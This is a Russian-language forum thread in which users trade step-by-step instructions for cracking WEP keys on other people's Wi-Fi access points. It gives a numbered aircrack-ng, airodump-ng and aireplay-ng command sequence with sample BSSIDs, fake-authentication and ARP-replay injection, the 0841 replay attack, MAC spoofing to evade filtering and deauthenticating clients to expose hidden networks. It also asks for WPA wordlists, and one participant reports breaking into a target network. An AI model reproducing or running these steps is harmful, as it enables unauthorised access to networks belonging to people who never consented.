Во-первихъ, aircrack-ng --help. А вообще нет, не автоматом, есть ключ команды aircrack-ng "-n 64" (для ключа 64 бит). Вот пример:
aircrack-ng -n 64 -b [bssid-сети вайфай] [filename- файл с перехваченными пакетами]-01.cap

http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3
По этой ссылке подробная инструкция по взлому WEP в BackTrack 3.
Всё проверено всё работает. Возникнут вопросы пиши

Уважаемый seteboz!
Попробовал я её сломать с помощью вашей подсказки и по ссылке смотрел,и так и так пробовал,ничего не получилось!Дело в том,что эта точка она скрытая и когда я ловлю с неё пакеты сначало узнаю название её потом как не странно она с WEP WEP переименовывается в WPA WEP шифрование!Рядом есть ещё точки у них шифрование такое WPA2 TKIP ну или чтото в этом роде!Может быть что та точка которую я хочу поломать скрывает не только своё имя но и шифрование с wep превращается в wpa!Какие есть мысли? А где можно хороших словарей скачать,а то меня уже стали окружать одни только WPA?И вообще,есть кто на этом форуме,кто смог изьять ключик на WPA? или ещё мало кто смог преодалеть такую защиту?

я ломаю WEP простым способом !

BT-3

1. #airmon-ng

2. #airmon-ng stop rausb0

{ rausb0 это мой драйвер для wi-fi карты поставишь свой какой выдаст airmon }

останавливаю Wi-fi карту для смены мак адреса .

3. # ifconfig rausb0 down

я пишу этот { 00:55:67:89:55:22 }

4. # macchanger --mac 00:55:67:89:55:22 rausb0

запускаем

5. # airmon-ng start rausb0

видим (monitor mode enabled on rausb0 )

Теперь сканим доступные беспроводные сети, использующие шфрование WEP


6 .# airodump-ng rausb0
остановить airodump клавишами Ctrl + С

Остановите airodump-ng и запустите его заново, записывая все пакеты в файл:

7. # airodump-ng -c 11 -w pokemon --bssid 00:1E:4C:B2:A8:47 rausb0

атакуем точку и комп

8. # aireplay-ng -1 0 -a 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0

запускаем дишифратор

9. # aireplay-ng -3 -b 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0

посе сбора 20 пакетов DATA запускаем aircrack

10. # aircrack-ng -b 00:1E:4C:B2:A8:47 pokemon-01.cap

и ждёмс ключ .Очень посто! если на точке висит комп вообще быстро взломаешь и смотри чтоб сигнал был не ниже 17%, выше сигнал успешней взлом ! всё получится ,дерзай !

удачи ,с уважением ко всем участникам сайта # Semby68 # SPAIN- RUSS #

И ещо , купил адаптор USB WI-FI мощный , вот ссылка

http://www.chinavasion.com/product_info.php/pName/80211g-high-power-wireless-usb-adapter-rtl8187-chipset/

>>aireplay-ng -1 0 -a 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0

Я бы при отсутсвии клиентов, да и вообще, использовал бы атаку p0841 - aireplay-ng -2 -p 0841 -e <имя_точки>
Не забыть поставить канал на котором висит точка с помощью iwconfig rausb0 channel <n>

я так понял { iwconfig rausb0 channel <n> } это настройка скорости между точкой и моей картой .

а атаку , p0841 , попробую ,
благодарю !# Semby68 #

Semby68
x-demon
ОГРОМНОЕ СПАСИБО!!!!!! наконец получилось! я вместо своего мак адреса подставил мак клиента и пакеты посыпались горой в 100 раз быстрее!Удачи вам и процветанию этому сайту!
НО ТЕПЕРЬ ВОЗНИКЛА ДРУГАЯ ПРОБЛЕМА!Как подключится к этой точке она же скрытая! использую WIFI Hopper!или есть др.софт для подключения к скрытым точкам?

Скрытую точку обнаружить просто. Надо запустить airodump-ng на канале, на котором висит точка, и ждать пока кто то подключится. Либо вышибить уже подключенного клиента. Как только он подключится - имя точки будет вскрыто.

Уважаемый x-demon
Вообщем получилось прописать имя и ключ ,но всё равно не могу подключится видимо там на точке стоит MAC или Ip фильтрация адресов!Может такое быть и как от этого исбавится,как мне изменить MAC и IP адрес чтоб подключится? А как можно узнать ip адрес точки доступа к которой я хочу подключится? и надо же ip знать?

macchanger --mac 11:22:33:44:55:66 wlan0 - значения подставить свои. Нет, если на точке включен DHCP. Если не включен... можно попробовать узнать пул IP адресов с помощью kismet